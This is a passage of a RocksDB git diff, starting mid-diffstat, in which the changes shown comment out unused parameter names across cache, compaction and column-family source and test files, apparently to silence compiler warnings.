+- table/block_based_table_builder.cc | 6 
+-
 table/block_based_table_factory.cc | 3 +-
 table/block_based_table_reader.cc | 18 +-
 table/block_test.cc | 2 +-
 table/cuckoo_table_builder_test.cc | 2 +-
 table/cuckoo_table_factory.cc | 2 +-
 table/cuckoo_table_factory.h | 5 +-
 table/cuckoo_table_reader.cc | 11 +-
 table/cuckoo_table_reader.h | 2 +-
 table/cuckoo_table_reader_test.cc | 2 +-
 table/full_filter_block.cc | 14 +-
 table/full_filter_block.h | 2 +-
 table/get_context.cc | 2 +-
 table/index_builder.h | 4 +-
 table/internal_iterator.h | 5 +-
 table/iterator.cc | 8 +-
 table/mock_table.cc | 16 +-
 table/mock_table.h | 6 +-
 table/partitioned_filter_block.cc | 2 +-
 table/partitioned_filter_block_test.cc | 4 +-
 table/plain_table_factory.cc | 2 +-
 table/plain_table_factory.h | 5 +-
 table/plain_table_key_coding.cc | 2 +-
 table/plain_table_reader.cc | 10 +-
 table/sst_file_writer_collectors.h | 6 +-
 table/table_reader.h | 6 +-
 table/table_test.cc | 53 +++---
 third-party/fbson/FbsonDocument.h | 2 +-
 tools/db_bench_tool.cc | 16 +-
 tools/ldb_cmd.cc | 40 ++---
 tools/ldb_tool.cc | 2 +-
 tools/sst_dump_tool.cc | 6 +-
 util/compression.h | 22 +--
 util/delete_scheduler_test.cc | 17 +-
 util/file_reader_writer_test.cc | 36 ++--
 util/slice.cc | 8 +-
 util/testutil.cc | 6 +-
 util/testutil.h | 74 ++++----
 util/thread_local_test.cc | 2 +-
 utilities/backupable/backupable_db.cc | 2 +-
 utilities/backupable/backupable_db_test.cc | 11 +-
 utilities/blob_db/blob_db.h | 6 +-
 utilities/blob_db/blob_db_impl.cc | 13 +-
 utilities/blob_db/blob_log_reader.cc | 2 +-
 utilities/checkpoint/checkpoint_impl.cc | 4 +-
 utilities/checkpoint/checkpoint_test.cc | 2 +-
 utilities/col_buf_decoder.h | 2 +-
 .../remove_emptyvalue_compactionfilter.cc | 11 +-
 utilities/document/document_db.cc | 21 +--
 utilities/merge_operators/max.cc | 8 +-
 utilities/merge_operators/put.cc | 27 ++-
 .../string_append/stringappend.cc | 8 +-
 .../string_append/stringappend2.cc | 8 +-
 utilities/merge_operators/uint64add.cc | 6 +-
 utilities/object_registry_test.cc | 13 +-
 utilities/options/options_util_test.cc | 34 ++--
 .../persistent_cache/block_cache_tier_file.cc | 2 +-
 .../persistent_cache/block_cache_tier_file.h | 6 +-
 utilities/persistent_cache/hash_table_test.cc | 4 +-
 .../persistent_cache/persistent_cache_test.h | 4 +-
 .../persistent_cache/persistent_cache_tier.cc | 4 +-
 .../persistent_cache/volatile_tier_impl.cc | 2 +-
 utilities/redis/redis_list_iterator.h | 2 +-
 utilities/simulator_cache/sim_cache.cc | 2 +-
 utilities/simulator_cache/sim_cache_test.cc | 2 +-
 utilities/spatialdb/spatial_db.cc | 2 +-
 .../compact_on_deletion_collector.cc | 11 +-
 .../compact_on_deletion_collector.h | 2 +-
 .../compact_on_deletion_collector_test.cc | 2 +-
 .../optimistic_transaction_impl.cc | 2 +-
 .../optimistic_transaction_impl.h | 4 +-
 utilities/transactions/transaction_base.h | 2 +-
 utilities/transactions/transaction_impl.cc | 4 +-
 utilities/transactions/transaction_impl.h | 2 +-
 utilities/transactions/transaction_test.cc | 8 +-
 utilities/ttl/ttl_test.cc | 6 +-
 .../write_batch_with_index_test.cc | 2 +-
 180 files changed, 1076 insertions(+), 1006 deletions(-)

diff --git a/cache/cache_test.cc b/cache/cache_test.cc
index 8e241226d9c..55f9cc6bb63 100644
--- a/cache/cache_test.cc
+++ b/cache/cache_test.cc
@@ -40,9 +40,9 @@ static int DecodeValue(void* v) {
 const std::string kLRU = "lru";
 const std::string kClock = "clock";
 
-void dumbDeleter(const Slice& key, void* value) {}
+void dumbDeleter(const Slice& /*key*/, void* /*value*/) {}
 
-void eraseDeleter(const Slice& key, void* value) {
+void eraseDeleter(const Slice& /*key*/, void* value) {
   Cache* cache = reinterpret_cast<Cache*>(value);
   cache->Erase("foo");
 }
@@ -470,7 +470,7 @@ class Value {
 };
 
 namespace {
-void deleter(const Slice& key, void* value) {
+void deleter(const Slice& /*key*/, void* value) {
   delete static_cast<Value*>(value);
 }
 }  // namespace
diff --git a/cache/clock_cache.cc b/cache/clock_cache.cc
index db9d1438e22..d5b32f82fe5 100644
--- a/cache/clock_cache.cc
+++ b/cache/clock_cache.cc
@@ -581,7 +581,7 @@ Status ClockCacheShard::Insert(const Slice& key, uint32_t hash, void* value,
                                size_t charge,
                                void (*deleter)(const Slice& key, void* value),
                                Cache::Handle** out_handle,
-                               Cache::Priority priority) {
+                               Cache::Priority /*priority*/) {
   CleanupContext context;
   HashTable::accessor accessor;
   char* key_data = new char[key.size()];
diff --git a/cache/sharded_cache.cc b/cache/sharded_cache.cc
index 9bdea3a08e1..6a0a2228211 100644
--- a/cache/sharded_cache.cc
+++ b/cache/sharded_cache.cc
@@ -53,7 +53,7 @@ Status ShardedCache::Insert(const Slice& key, void* value, size_t charge,
       ->Insert(key, hash, value, charge, deleter, handle, priority);
 }
 
-Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* stats) {
+Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* /*stats*/) {
   uint32_t hash = HashSlice(key);
   return GetShard(Shard(hash))->Lookup(key, hash);
 }
diff --git a/db/builder.cc b/db/builder.cc
index 6f973fdbd5b..6c68e7c4052 100644
--- a/db/builder.cc
+++ b/db/builder.cc
@@ -61,10 +61,10 @@ TableBuilder* NewTableBuilder(
 
 Status BuildTable(
     const std::string& dbname, Env* env, const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options, const EnvOptions& env_options,
-    TableCache* table_cache, InternalIterator* iter,
-    std::unique_ptr<InternalIterator> range_del_iter, FileMetaData* meta,
-    const InternalKeyComparator& internal_comparator,
+    const MutableCFOptions& /*mutable_cf_options*/,
+    const EnvOptions& env_options, TableCache* table_cache,
+    InternalIterator* iter, std::unique_ptr<InternalIterator> range_del_iter,
+    FileMetaData* meta, const InternalKeyComparator& internal_comparator,
     const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
         int_tbl_prop_collector_factories,
     uint32_t column_family_id, const std::string& column_family_name,
diff --git a/db/c.cc b/db/c.cc
index 441ffade3b6..a09d014ec1e 100644
--- a/db/c.cc
+++ b/db/c.cc
@@ -240,7 +240,7 @@ struct rocksdb_comparator_t : public Comparator {
   // No-ops since the C binding does not support key shortening methods.
   virtual void FindShortestSeparator(std::string*,
                                      const Slice&) const override {}
-  virtual void FindShortSuccessor(std::string* key) const override {}
+  virtual void FindShortSuccessor(std::string* /*key*/) const override {}
 };
 
 struct rocksdb_filterpolicy_t : public FilterPolicy {
@@ -355,7 +355,7 @@ struct rocksdb_mergeoperator_t : public MergeOperator {
   virtual bool PartialMergeMulti(const Slice& key,
                                  const std::deque<Slice>& operand_list,
                                  std::string* new_value,
-                                 Logger* logger) const override {
+                                 Logger* /*logger*/) const override {
     size_t operand_count = operand_list.size();
     std::vector<Slice> operand_pointers(operand_count);
     std::vector<size_t> operand_sizes(operand_count);
@@ -2106,8 +2106,8 @@ void rocksdb_options_set_level0_stop_writes_trigger(
   opt->rep.level0_stop_writes_trigger = n;
 }
 
-void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* opt,
-                                                  int n) {}
+void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* /*opt*/,
+                                                  int /*n*/) {}
 
 void rocksdb_options_set_wal_recovery_mode(rocksdb_options_t* opt,int mode) {
   opt->rep.wal_recovery_mode = static_cast<WALRecoveryMode>(mode);
@@ -2171,8 +2171,8 @@ void rocksdb_options_set_manifest_preallocation_size(
 }
 
 // noop
-void rocksdb_options_set_purge_redundant_kvs_while_flush(rocksdb_options_t* opt,
-                                                         unsigned char v) {}
+void rocksdb_options_set_purge_redundant_kvs_while_flush(
+    rocksdb_options_t* /*opt*/, unsigned char /*v*/) {}
 
 void rocksdb_options_set_use_direct_reads(rocksdb_options_t* opt,
                                           unsigned char v) {
@@ -2332,7 +2332,7 @@ void rocksdb_options_set_table_cache_numshardbits(
 }
 
 void rocksdb_options_set_table_cache_remove_scan_count_limit(
-    rocksdb_options_t* opt, int v) {
+    rocksdb_options_t* /*opt*/, int /*v*/) {
   // this option is deprecated
 }
 
@@ -2836,7 +2836,7 @@ rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create(
 
 rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create_with_comparator(
     const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options,
-    const rocksdb_comparator_t* comparator) {
+    const rocksdb_comparator_t* /*comparator*/) {
   rocksdb_sstfilewriter_t* writer = new rocksdb_sstfilewriter_t;
   writer->rep = new SstFileWriter(env->rep, io_options->rep);
   return writer;
diff --git a/db/column_family_test.cc b/db/column_family_test.cc
index 88786d469d5..440fc9930a3 100644
--- a/db/column_family_test.cc
+++ b/db/column_family_test.cc
@@ -1168,13 +1168,14 @@ TEST_F(ColumnFamilyTest, MemtableNotSupportSnapshot) {
 #endif  // !ROCKSDB_LITE
 
 class TestComparator : public Comparator {
-  int Compare(const rocksdb::Slice& a, const rocksdb::Slice& b) const override {
+  int Compare(const rocksdb::Slice& /*a*/,
+              const rocksdb::Slice& /*b*/) const override {
     return 0;
   }
   const char* Name() const override { return "Test"; }
-  void FindShortestSeparator(std::string* start,
-                             const rocksdb::Slice& limit) const override {}
-  void FindShortSuccessor(std::string* key) const override {}
+  void FindShortestSeparator(std::string* /*start*/,
+                             const rocksdb::Slice& /*limit*/) const override {}
+  void FindShortSuccessor(std::string* /*key*/) const override {}
 };
 
 static TestComparator third_comparator;
@@ -1346,7 +1347,7 @@ TEST_F(ColumnFamilyTest, MultipleManualCompactions) {
        {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:5"},
        {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:3"}});
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
+      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) {
         if (cf_1_1) {
           TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:4");
           cf_1_1 = false;
@@ -1439,7 +1440,7 @@ TEST_F(ColumnFamilyTest, AutomaticAndManualCompactions) {
        {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:5"},
        {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:3"}});
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
+      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) {
         if (cf_1_1) {
           cf_1_1 = false;
           TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4");
@@ -1540,7 +1541,7 @@ TEST_F(ColumnFamilyTest, ManualAndAutomaticCompactions) {
        {"ColumnFamilyTest::ManualAuto:5", "ColumnFamilyTest::ManualAuto:2"},
        {"ColumnFamilyTest::ManualAuto:2", "ColumnFamilyTest::ManualAuto:3"}});
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
+      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) {
         if (cf_1_1) {
           TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4");
           cf_1_1 = false;
@@ -1633,7 +1634,7 @@ TEST_F(ColumnFamilyTest, SameCFManualManualCompactions) {
        {"ColumnFamilyTest::ManualManual:1",
         "ColumnFamilyTest::ManualManual:3"}});
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
+      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) {
         if (cf_1_1) {
           TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:4");
           cf_1_1 = false;
@@ -1731,7 +1732,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactions) {
        {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:2"},
        {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}});
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
+      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) {
         if (cf_1_1) {
           TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4");
           cf_1_1 = false;
@@ -1823,7 +1824,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactionsLevel) {
         "ColumnFamilyTest::ManualAuto:3"},
        {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}});
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
+      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) {
         if (cf_1_1) {
           TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4");
           cf_1_1 = false;
@@ -1926,7 +1927,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticConflict) {
        {"ColumnFamilyTest::ManualAutoCon:1",
         "ColumnFamilyTest::ManualAutoCon:3"}});
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
+      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) {
         if (cf_1_1) {
           TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:4");
           cf_1_1 = false;
@@ -2030,7 +2031,7 @@ TEST_F(ColumnFamilyTest, SameCFAutomaticManualCompactions) {
        {"CompactionPicker::CompactRange:Conflict",
         "ColumnFamilyTest::AutoManual:3"}});
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
+      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) {
         if (cf_1_1) {
           TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4");
           cf_1_1 = false;
@@ -2476,21 +2477,21 @@ TEST_F(ColumnFamilyTest, CreateAndDropRace) {
 
   auto main_thread_id = std::this_thread::get_id();
 
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("PersistRocksDBOptions:start",
-                                                 [&](void* arg) {
-    auto current_thread_id = std::this_thread::get_id();
-    // If it's the main thread hitting this sync-point, then it
-    // will be blocked until some other thread update the test_stage.
-    if (main_thread_id == current_thread_id) {
-      test_stage = kMainThreadStartPersistingOptionsFile;
-      while (test_stage < kChildThreadFinishDroppingColumnFamily) {
-        Env::Default()->SleepForMicroseconds(100);
-      }
-    }
-  });
+  rocksdb::SyncPoint::GetInstance()->SetCallBack(
+      "PersistRocksDBOptions:start", [&](void* /*arg*/) {
+        auto current_thread_id = std::this_thread::get_id();
+        // If it's the main thread hitting this sync-point, then it
+        // will be blocked until some other thread update the test_stage.
+        if (main_thread_id == current_thread_id) {
+          test_stage = kMainThreadStartPersistingOptionsFile;
+          while (test_stage < kChildThreadFinishDroppingColumnFamily) {
+            Env::Default()->SleepForMicroseconds(100);
+          }
+        }
+      });
 
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "WriteThread::EnterUnbatched:Wait", [&](void* arg) {
+      "WriteThread::EnterUnbatched:Wait", [&](void* /*arg*/) {
         // This means a thread doing DropColumnFamily() is waiting for
         // other thread to finish persisting options.
         // In such case, we update the test_stage to unblock the main thread.
diff --git a/db/compact_files_test.cc b/db/compact_files_test.cc
index 5aad6114f5e..7f150453960 100644
--- a/db/compact_files_test.cc
+++ b/db/compact_files_test.cc
@@ -37,8 +37,7 @@ class FlushedFileCollector : public EventListener {
   FlushedFileCollector() {}
   ~FlushedFileCollector() {}
 
-  virtual void OnFlushCompleted(
-      DB* db, const FlushJobInfo& info) override {
+  virtual void OnFlushCompleted(DB* /*db*/, const FlushJobInfo& info) override {
     std::lock_guard<std::mutex> lock(mutex_);
     flushed_files_.push_back(info.file_path);
   }
@@ -257,9 +256,9 @@ TEST_F(CompactFilesTest, CapturingPendingFiles) {
 TEST_F(CompactFilesTest, CompactionFilterWithGetSv) {
   class FilterWithGet : public CompactionFilter {
    public:
-    virtual bool Filter(int level, const Slice& key, const Slice& value,
-                        std::string* new_value,
-                        bool* value_changed) const override {
+    virtual bool Filter(int /*level*/, const Slice& /*key*/,
+                        const Slice& /*value*/, std::string* /*new_value*/,
+                        bool* /*value_changed*/) const override {
       if (db_ == nullptr) {
         return true;
       }
diff --git a/db/compacted_db_impl.h b/db/compacted_db_impl.h
index de32f21e681..736002e1e52 100644
--- a/db/compacted_db_impl.h
+++ b/db/compacted_db_impl.h
@@ -32,55 +32,56 @@ class CompactedDBImpl : public DBImpl {
       override;
 
   using DBImpl::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) override {
+  virtual Status Put(const WriteOptions& /*options*/,
+                     ColumnFamilyHandle* /*column_family*/,
+                     const Slice& /*key*/, const Slice& /*value*/) override {
     return Status::NotSupported("Not supported in compacted db mode.");
   }
   using DBImpl::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override {
+  virtual Status Merge(const WriteOptions& /*options*/,
+                       ColumnFamilyHandle* /*column_family*/,
+                       const Slice& /*key*/, const Slice& /*value*/) override {
    return Status::NotSupported("Not supported in compacted db mode.");
   }
   using DBImpl::Delete;
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override {
+  virtual Status Delete(const WriteOptions& /*options*/,
+                        ColumnFamilyHandle* /*column_family*/,
+                        const Slice& /*key*/) override {
     return Status::NotSupported("Not supported in compacted db mode.");
   }
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override {
+  virtual Status Write(const WriteOptions& /*options*/,
+                       WriteBatch* /*updates*/) override {
     return Status::NotSupported("Not supported in compacted db mode.");
   }
   using DBImpl::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) override {
+  virtual Status CompactRange(const CompactRangeOptions& /*options*/,
+                              ColumnFamilyHandle* /*column_family*/,
+                              const Slice* /*begin*/,
+                              const Slice* /*end*/) override {
     return Status::NotSupported("Not supported in compacted db mode.");
   }
 
   virtual Status DisableFileDeletions() override {
     return Status::NotSupported("Not supported in compacted db mode.");
   }
-  virtual Status EnableFileDeletions(bool force) override {
+  virtual Status EnableFileDeletions(bool /*force*/) override {
     return Status::NotSupported("Not supported in compacted db mode.");
   }
   virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) override {
+                              uint64_t* /*manifest_file_size*/,
+                              bool /*flush_memtable*/ = true) override {
     return Status::NotSupported("Not supported in compacted db mode.");
   }
   using DBImpl::Flush;
-  virtual Status Flush(const FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override {
+  virtual Status Flush(const FlushOptions& /*options*/,
+                       ColumnFamilyHandle* /*column_family*/) override {
     return Status::NotSupported("Not supported in compacted db mode.");
  }
   using DB::IngestExternalFile;
   virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& ingestion_options) override {
+      ColumnFamilyHandle* /*column_family*/,
+      const std::vector<std::string>& /*external_files*/,
+      const IngestExternalFileOptions& /*ingestion_options*/) override {
     return Status::NotSupported("Not supported in compacted db mode.");
   }
diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc
index 08ae1973409..211a48def73 100644
--- a/db/compaction_iterator.cc
+++ b/db/compaction_iterator.cc
@@ -50,7 +50,7 @@ CompactionIterator::CompactionIterator(
 
 CompactionIterator::CompactionIterator(
     InternalIterator* input, const Comparator* cmp, MergeHelper* merge_helper,
-    SequenceNumber last_sequence, std::vector<SequenceNumber>* snapshots,
+    SequenceNumber /*last_sequence*/, std::vector<SequenceNumber>* snapshots,
     SequenceNumber earliest_write_conflict_snapshot, Env* env,
     bool expect_valid_internal_key, RangeDelAggregator* range_del_agg,
     std::unique_ptr<CompactionProxy> compaction,
diff --git a/db/compaction_iterator.h b/db/compaction_iterator.h
index cad23866699..492e53abff0 100644
--- a/db/compaction_iterator.h
+++ b/db/compaction_iterator.h
@@ -31,7 +31,7 @@ class CompactionIterator {
         : compaction_(compaction) {}
     virtual ~CompactionProxy() = default;
 
-    virtual int level(size_t compaction_input_level = 0) const {
+    virtual int level(size_t /*compaction_input_level*/ = 0) const {
       return compaction_->level();
     }
     virtual bool KeyNotExistsBeyondOutputLevel(
diff --git a/db/compaction_iterator_test.cc b/db/compaction_iterator_test.cc
index b625c99ffaa..7f2915b0aa3 100644
--- a/db/compaction_iterator_test.cc
+++ b/db/compaction_iterator_test.cc
@@ -17,15 +17,15 @@ namespace rocksdb {
 // Expects no merging attempts.
 class NoMergingMergeOp : public MergeOperator {
  public:
-  bool FullMergeV2(const MergeOperationInput& merge_in,
-                   MergeOperationOutput* merge_out) const override {
+  bool FullMergeV2(const MergeOperationInput& /*merge_in*/,
+                   MergeOperationOutput* /*merge_out*/) const override {
     ADD_FAILURE();
     return false;
   }
-  bool PartialMergeMulti(const Slice& key,
-                         const std::deque<Slice>& operand_list,
-                         std::string* new_value,
-                         Logger* logger) const override {
+  bool PartialMergeMulti(const Slice& /*key*/,
+                         const std::deque<Slice>& /*operand_list*/,
+                         std::string* /*new_value*/,
+                         Logger* /*logger*/) const override {
     ADD_FAILURE();
     return false;
   }
@@ -39,9 +39,10 @@ class NoMergingMergeOp : public MergeOperator {
 // Always returns Decition::kRemove.
 class StallingFilter : public CompactionFilter {
  public:
-  virtual Decision FilterV2(int level, const Slice& key, ValueType t,
-                            const Slice& existing_value, std::string* new_value,
-                            std::string* skip_until) const override {
+  virtual Decision FilterV2(int /*level*/, const Slice& key, ValueType /*t*/,
+                            const Slice& /*existing_value*/,
+                            std::string* /*new_value*/,
+                            std::string* /*skip_until*/) const override {
     int k = std::atoi(key.ToString().c_str());
     last_seen.store(k);
     while (k >= stall_at.load()) {
@@ -112,7 +113,7 @@ class LoggingForwardVectorIterator : public InternalIterator {
                  keys_.begin();
   }
 
-  virtual void SeekForPrev(const Slice& target) override { assert(false); }
+  virtual void SeekForPrev(const Slice& /*target*/) override { assert(false); }
 
   virtual void Next() override {
     assert(Valid());
@@ -144,9 +145,9 @@ class FakeCompaction : public CompactionIterator::CompactionProxy {
  public:
   FakeCompaction() = default;
 
-  virtual int level(size_t compaction_input_level) const { return 0; }
+  virtual int level(size_t /*compaction_input_level*/) const { return 0; }
   virtual bool KeyNotExistsBeyondOutputLevel(
-      const Slice& user_key, std::vector<size_t>* level_ptrs) const {
+      const Slice& /*user_key*/, std::vector<size_t>* /*level_ptrs*/) const {
     return key_not_exists_beyond_output_level;
   }
   virtual bool bottommost_level() const { return false; }
@@ -276,9 +277,9 @@ TEST_F(CompactionIteratorTest, RangeDeletionWithSnapshots) {
 
 TEST_F(CompactionIteratorTest, CompactionFilterSkipUntil) {
   class Filter : public CompactionFilter {
-    virtual Decision FilterV2(int level, const Slice& key, ValueType t,
+    virtual Decision FilterV2(int /*level*/, const Slice& key, ValueType t,
                               const Slice& existing_value,
-                              std::string* new_value,
+                              std::string* /*new_value*/,
                               std::string* skip_until) const override {
       std::string k = key.ToString();
      std::string v = existing_value.ToString();
diff --git a/db/compaction_job_stats_test.cc b/db/compaction_job_stats_test.cc
index 9a8372f5785..c20c120e580 100644
--- a/db/compaction_job_stats_test.cc
+++ b/db/compaction_job_stats_test.cc
@@ -426,7 +426,7 @@ class CompactionJobStatsChecker : public EventListener {
   // Once a compaction completed, this function will verify the returned
   // CompactionJobInfo with the oldest CompactionJobInfo added earlier
   // in "expected_stats_" which has not yet being used for verification.
-  virtual void OnCompactionCompleted(DB *db, const CompactionJobInfo& ci) {
+  virtual void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) {
     if (verify_next_comp_io_stats_) {
       ASSERT_GT(ci.stats.file_write_nanos, 0);
       ASSERT_GT(ci.stats.file_range_sync_nanos, 0);
@@ -806,7 +806,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) {
     stats_checker->set_verify_next_comp_io_stats(true);
     std::atomic<bool> first_prepare_write(true);
     rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::Append:BeforePrepareWrite", [&](void* arg) {
+        "WritableFileWriter::Append:BeforePrepareWrite", [&](void* /*arg*/) {
          if (first_prepare_write.load()) {
            options.env->SleepForMicroseconds(3);
            first_prepare_write.store(false);
@@ -815,7 +815,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) {
 
     std::atomic<bool> first_flush(true);
     rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::Flush:BeforeAppend", [&](void* arg) {
+        "WritableFileWriter::Flush:BeforeAppend", [&](void* /*arg*/) {
          if (first_flush.load()) {
            options.env->SleepForMicroseconds(3);
            first_flush.store(false);
@@ -824,7 +824,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) {
 
     std::atomic<bool> first_sync(true);
     rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::SyncInternal:0", [&](void* arg) {
+        "WritableFileWriter::SyncInternal:0", [&](void* /*arg*/) {
          if (first_sync.load()) {
            options.env->SleepForMicroseconds(3);
            first_sync.store(false);
@@ -833,7 +833,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) {
 
     std::atomic<bool> first_range_sync(true);
     rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::RangeSync:0", [&](void* arg) {
+        "WritableFileWriter::RangeSync:0", [&](void* /*arg*/) {
          if (first_range_sync.load()) {
            options.env->SleepForMicroseconds(3);
            first_range_sync.store(false);
diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc
index 6ee4ebd1f16..7264ed20c6f 100644
--- a/db/compaction_picker.cc
+++ b/db/compaction_picker.cc
@@ -199,7 +199,7 @@ void CompactionPicker::GetRange(const std::vector<CompactionInputFiles>& inputs,
   assert(initialized);
 }
 
-bool CompactionPicker::ExpandInputsToCleanCut(const std::string& cf_name,
+bool CompactionPicker::ExpandInputsToCleanCut(const std::string& /*cf_name*/,
                                               VersionStorageInfo* vstorage,
                                               CompactionInputFiles* inputs) {
   // This isn't good compaction
@@ -318,7 +318,7 @@ Compaction* CompactionPicker::CompactFiles(
 Status CompactionPicker::GetCompactionInputsFromFileNumbers(
     std::vector<CompactionInputFiles>* input_files,
     std::unordered_set<uint64_t>* input_set, const VersionStorageInfo* vstorage,
-    const CompactionOptions& compact_options) const {
+    const CompactionOptions& /*compact_options*/) const {
   if (input_set->size() == 0U) {
     return Status::InvalidArgument(
         "Compaction must include at least one file.");
@@ -1581,8 +1581,9 @@ Compaction* FIFOCompactionPicker::PickCompaction(
 Compaction* FIFOCompactionPicker::CompactRange(
     const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
     VersionStorageInfo* vstorage, int input_level, int output_level,
-    uint32_t output_path_id, const InternalKey* begin, const InternalKey* end,
-    InternalKey** compaction_end, bool* manual_conflict) {
+    uint32_t /*output_path_id*/, const InternalKey* /*begin*/,
+    const InternalKey* /*end*/, InternalKey** compaction_end,
+    bool* /*manual_conflict*/) {
   assert(input_level == 0);
   assert(output_level == 0);
   *compaction_end = nullptr;
diff --git a/db/compaction_picker.h b/db/compaction_picker.h
index f44139c2dd9..44b93d7747b 100644
--- a/db/compaction_picker.h
+++ b/db/compaction_picker.h
@@ -263,27 +263,29 @@ class NullCompactionPicker : public CompactionPicker {
   virtual ~NullCompactionPicker() {}
 
   // Always return "nullptr"
-  Compaction* PickCompaction(const std::string& cf_name,
-                             const MutableCFOptions& mutable_cf_options,
-                             VersionStorageInfo* vstorage,
-                             LogBuffer* log_buffer) override {
+  Compaction* PickCompaction(const std::string& /*cf_name*/,
+                             const MutableCFOptions& /*mutable_cf_options*/,
+                             VersionStorageInfo* /*vstorage*/,
+                             LogBuffer* /*log_buffer*/) override {
     return nullptr;
   }
 
   // Always return "nullptr"
-  Compaction* CompactRange(const std::string& cf_name,
-                           const MutableCFOptions& mutable_cf_options,
-                           VersionStorageInfo* vstorage, int input_level,
-                           int output_level, uint32_t output_path_id,
-                           const InternalKey* begin, const InternalKey* end,
-                           InternalKey** compaction_end,
-                           bool* manual_conflict) override {
+  Compaction* CompactRange(const std::string& /*cf_name*/,
+                           const MutableCFOptions& /*mutable_cf_options*/,
+                           VersionStorageInfo* /*vstorage*/,
+                           int /*input_level*/, int /*output_level*/,
+                           uint32_t /*output_path_id*/,
+                           const InternalKey* /*begin*/,
+                           const InternalKey* /*end*/,
+                           InternalKey** /*compaction_end*/,
+                           bool* /*manual_conflict*/) override {
     return nullptr;
   }
 
   // Always returns false.
   virtual bool NeedsCompaction(
-      const VersionStorageInfo* vstorage) const override {
+      const VersionStorageInfo* /*vstorage*/) const override {
     return false;
   }
 };
diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc
index 1ced12cfd5d..7e981451725 100644
--- a/db/compaction_picker_test.cc
